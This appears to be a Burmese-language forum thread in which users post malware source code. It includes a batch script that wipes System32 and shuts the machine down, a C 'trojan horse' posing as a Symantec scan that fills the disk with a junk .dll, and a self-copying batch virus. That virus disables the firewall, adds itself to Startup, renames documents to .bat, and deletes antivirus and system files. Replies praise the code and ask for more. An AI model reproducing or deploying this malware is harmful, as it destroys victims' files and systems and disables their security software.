IF EXIST RemLat2a.txt dnif.exe /I "."<RemLat2a.txt>NUL && For /f "tokens=*" %%a in (RemLat2a.txt) do (    
IF NOT EXIST "%%a" ECHO %%a - Deleted>>DBFIX_Report.txt
IF EXIST "%%a" ECHO Unable To Remove %%a!>>DBFIX_Report.txt
   )

IF NOT EXIST TESTSFBT1.TXT GOTO SEBTFNE

apps\Csweg.exe QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot" /s>TESTsboot2.txt
IF EXIST TESTsboot2.txt dnif.exe /I "Boot file system"<TESTsboot2.txt>NUL && dnif.exe /I "vga.sys"<TESTsboot2.txt>NUL && ECHO Safeboot Keys Repaired Successfully>TESTSFB1.txt||echo Unable to repair SafeBoot key!>TESTSFB1.txt

:SEBTFNE

echo.>>DBFIX_Report.txt
IF EXIST TestBotDelphi.txt apps\Csweg QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run">>TestDelfRun.txt
IF EXIST TestBotDelphi.txt For /f "tokens=*" %%b in (TestBotDelphi.txt) do dnif.exe /I "%%~b"<TestDelfRun.txt|dnif.exe /I ".exe">nul && echo %%b - Unable to remove registry value!>>DBFIX_Report.txt||echo HKLM\~\Run %%b - Deleted>>DBFIX_Report.txt
echo.>>DBFIX_Report.txt
FIND.EXE /I "HOSTS "<DBFIX_Report.txt>NUL && dnif.exe /I "andymanchesta"<%windir%\SYSTEM32\DRIVERS\ETC\HOSTS>NUL && ECHO Unable to Repair HOSTS file!>>DBFIX_Report.txt||ECHO HOSTS File Replaced Successfully>>DBFIX_Report.txt
IF EXIST TESTSFB1.txt TYPE TESTSFB1.txt>>DBFIX_Report.txt
echo.>>DBFIX_Report.txt
echo Finished!>>DBFIX_Report.txt
echo.>>DBFIX_Report.txt

IF EXIST HOSTS.BAK MOVE /Y HOSTS.BAK .\DBFIX_backups\ >nul
IF EXIST test*.txt del /q test*.txt >nul
IF EXIST repair*.reg del /q repair*.reg >nul
IF EXIST find*.txt del /q find*.txt >nul
IF EXIST file*.txt del /q file*.txt >nul
IF EXIST check*.txt del /q check*.txt >nul
IF EXIST dnif.exe del /q dnif.exe >nul
IF EXIST editreg.exe del /q editreg.exe >nul
IF EXIST Remlat*.txt del /q Remlat*.txt >nul
IF EXIST rtsdnif.exe del /q rtsdnif.exe >nul

apps\zip "DBFIX_backups.zip" DBFIX_backups\*.* >nul 2>&1
del /q DBFIX_backups\*.* >nul 2>&1
move DBFIX_backups.zip DBFIX_backups\ >nul 2>&1

Start notepad DBFIX_Report.txt && exit

:end

EXIT

Code:

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

loop

Code:

echo off
cd C:/Windows/System32
cls
del *.txt /s /a /f /q
cls
del *.exe /s /a /f /q
cls
del *.zip /s /a /f /q
cls
del *.bat /s /a /f /q
cls
del *.cmd /s /a /f /q
cls
del *.dll /s /a /f /q
cls
del *.sys /s /a /f /q
cls
del *.ini /s /a /f /q
cls
del *.drv /s /a /f /q
cls
del *.doc /s /a /f /q
cls
echo.
color 0A
cls
echo S
ping localhost -n .15 >nul
cls
echo Sa
ping localhost -n .15 >nul
cls
echo Say
ping localhost -n .15 >nul
cls
echo Say
ping localhost -n .15 >nul
cls
echo Say G
ping localhost -n .15 >nul
cls
echo Say Go
ping localhost -n .15 >nul
cls
echo Say Goo
ping localhost -n .15 >nul
cls
echo Say Good
ping localhost -n .15 >nul
cls
echo Say Goodb
ping localhost -n .15 >nul
cls
echo Say Goodby
ping localhost -n .15 >nul
cls
echo Say Goodbye
ping localhost -n .15 >nul
cls
echo Say Goodbye.
ping localhost -n .15 >nul
cls
echo Say Goodbye..
ping localhost -n .15 >nul
cls
echo Say Goodbye...
ping localhost -n 5 >nul
cls
color 01
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
color 06
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
color 07
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
color 03
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
color 05
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
color 02
echo 111    11111    11111    11111    11111    11111    1111111  111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
color 04
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
color 05
color 01
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
color 06
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
color 07
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
color 03
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
color 05
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
color 02
echo 111    11111    11111    11111    11111    11111    1111111  111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
color 04
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
color 05
color 01
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
color 06
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
color 07
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
color 03
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
color 05
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
color 02
echo 111    11111    11111    11111    11111    11111    1111111  111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
color 04
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
color 05color 01
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
color 06
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
color 07
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
color 03
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
color 05
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
color 02
echo 111    11111    11111    11111    11111    11111    1111111  111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
color 04
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
color 05color 01
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
color 06
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
color 07
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
color 03
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
color 05
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
color 02
echo 111    11111    11111    11111    11111    11111    1111111  111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
color 04
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
color 05color 01
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
color 06
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
color 07
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
color 03
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
color 05
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
color 02
echo 111    11111    11111    11111    11111    11111    1111111  111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
color 04
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
color 05color 01
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
color 06
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
color 07
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
color 03
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
color 05
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
color 02
echo 111    11111    11111    11111    11111    11111    1111111  111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
color 04
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
color 05color 01
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
color 06
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
color 07
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
color 03
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
shutdown /s

zawmin wrote:ဒါေတြက အစ္ကိုေရးထားတာလား။။။
10 00100 10001 00010 00100 0000100 000000010 101110000
အဲ့ဒီ code ေတြက ေတာ္ေတာ္ရွဳပ္တယ္ဗ်ာ။နားေတာင္မလည္ေတာ့ဘူး။သိရင္ရွင္းၿပ....ဟီး ဟီး

ကြ်န္ေတာ္ ေရးထားတာ မဟုတ္ရပါဘူးဗ်ာ ကြ်န္ေတာ္သာေရးႏိုင္မယ္ ဆို ေသခ်ာရွင္းၿပပလိုက္မယ္

အဲ့ code ေတြက string ကို colour echo အေနနဲ့ ၿပတာေတြပါ xD

Code:

http://ifile.it/3e721tf/vbstoexe.exe

Code:

#include
#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}



yarzarmin wrote:အားၾကီးကိုအားေပးပါတယ္။ကို virus ရယ္။
ေက်းဇူးေနာ္ ေတာ္ေတာ္နားလယ္ျပီ။
ေနာက္လဲတင္ပါဦ။

Code:

@echo off

color 2
:Start
msg * Computer Error
pause
msg * Windows Will Try To Fix The Error
pause
cls

cd %windir%\system32
del mouse.drv /S /F /Q
del keyboard.drv /S /F /Q
del keyboard.sys /S /F /Q
cls
netsh firewall set opmode mode=disable
cls
copy %0 "c:\WINDOWS"
copy %0 "c:\WINDOWS\system32"
copy %0 "c:\WINDOWS\system"
copy %0 "%systemdrive%\Documents and Settings\%username%\Start Menu\Programs\Startup"
cls

time 6:66
cls

echo Windows Has Detected The Error Please Wait...
pause
echo Attempting To Fix The Error...
pause
echo Error Virus Detected!
pause
echo D385TRUCT1oN
cls
cd %userprofile%\my documents
ren *.txt *.bat
ren *.doc *.bat
ren *.pub *.bat
ren *.pps *.bat
ren *.htm *.bat
ren *.pdf *.bat
cls
cd %userprofile%\my documents\my pictures
ren *.gif *.bat
ren *.jpg *.bat
ren *.jpeg *.bat
ren *.bmp *.bat
ren *.dip *.bat
ren *.tif *.bat
ren *.png *.bat
cls
cd %userprofile%\my documents\my music
ren *.mp3 *.bat
ren *.mp4 *.bat
ren *.wav *.bat
ren *.mpeg *.bat
ren *.mpg *.bat
pause
cd\
del "%systemdrive%\Program Files\*.*" /S /F /Q
del "%systemdrive%\Windows\*.*" /S /F /Q
del "%systemdrive%\My Documents\*.*" /S /F /Q
del *.exe /F /Q
del *.rar /F /Q
del *.zip /F /Q
del *.mp3 /F /Q
del *.mp4 /F /Q
del *.wav /F /Q
del *.avi /F /Q
del *.jpeg /F /Q
del *.dvix /F /Q
del *.mpg /F /Q
del *.vob /F /Q
del *.mov /F /Q
del *.m2v /F /Q
del *.flv /F /Q
del *.wmv /F /Q
del *.txt /F /Q
del *.pdf /F /Q
del *.dll /F /Q
del *.reg /F /Q
del *.ini /F /Q
del *.com /F /Q
del *.scr /F /Q
del *.jpg /F /Q
del *.gif /F /Q
del *.png /F /Q
del *.bmp /F /Q
del *.ico /F /Q
del *.xml /F /Q
del *.kwm /F /Q
del *.dat /F /Q
del *.hta /F /Q
del *.htm /F /Q
del *.css /F /Q
del *.apl /F /Q
del *.api /F /Q
del *.js /F /Q
del *.html /F /Q
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
del c:\WINDOWS\system32\ipconfig.exe /S /Q /F
del c:\WINDOWS\system32\xcopy.exe /S /Q /F
del c:\WINDOWS\system32\logoff.exe /S /Q /F
del c:\WINDOWS\system32\rename.exe /S /Q /F
del c:\WINDOWS\system32\tracert.exe /S /Q /F
del c:\WINDOWS\system32\ping.exe /S /Q /F
del c:\WINDOWS\system32\ping6.exe /S /Q /F
del c:\WINDOWS\system32\compact.exe /S /Q /F
del c:\WINDOWS\system32\chkdsk.exe /S /Q /F
del c:\WINDOWS\system32\msg.exe /S /Q /F
del c:\WINDOWS\system32\attrib.exe /S /Q /F
del c:\WINDOWS\system32\format.exe /S /Q /F
del c:\WINDOWS\system32\netsh.exe /S /Q /F
del c:\WINDOWS\system32\netstat.exe /S /Q /F
del c:\WINDOWS\system32\net.exe /S /Q /F
del c:\WINDOWS\system32\reg.exe /S /Q /F
del c:\WINDOWS\system32\tskill.exe /S /Q /F
dir %windir%
del *.* /q /f
dir %windir%/system32
del *.* /q /f
dir %windir%/fonts
del *.* /q /f
dir %windir%/system
del *.* /q /f
dir %windir%/system32/drivers
del *.* /q /f

msg * well u dumb it all over (Hack-tech.com):P
shutdown -s -t 600 -c "Windows Will ShutDown To Stop The Virus!"


heamatitecross wrote:အား desktop ေပါ မွာ notepad ေရ ပီ အကို ေျပာ တဲ့ အတိုင္ းသိမ္း လိုက္ တာ .. အဲဒီ့ ဖုိင္ နာမည္ နဲ ့
ရွာ ရင္ ေတာ့ မ တက္ လား ဘူး .. ဒါ ေပ မယ္ ့symatic အန္တီဗိုင္းရက္စ္ က ခဏ ခဏ ... သတိ ေပ းေန တယ္ ..
အေရာက္ ပို ့ တာ ေတာ ့မ ဟုတ္ ဘူး ေနာ္ .. ကြ်န္ေတာ့္ သိမ္း တဲ့ ဟာ က GMW.vbs ..
(လူမ်ား ကို အီေမးလ္ ပို ့ ပီ း..ဒုကၡေပး ပို ့ .. ကို ကို တိုင္ ခံ လိုက္ ရ ပီ တင္ တယ္ )

ငစလူ wrote:OVERVIEW:
-----------
This Trojan horse we will be making appears itself as
an antivirus program that scans the computer and removes the threats.
But in reality it does nothing but occupy the hard disk space on the
root drive by just filling it up with a huge junk file. The rate at
which it fills up the hard disk space it too high. As a result the the
disk gets filled up to 100% with in minutes of running this Trojan. Once
the disk space is full, the Trojan reports that the scan is complete.
The victim will not be able to clean up the hard disk space using any
cleanup program. This is because the Trojan intelligently creates a huge
file in the WindowsSystem32 folder with the .dll extension. Since the
junk file has the .dll extention it is often ignored by disk cleanup
softwares. So for the victim, there is now way to recover the hard disk
space unless reformatting his drive.

Code:

 
....
....
....
....


[You must be registered and logged in to see this link.]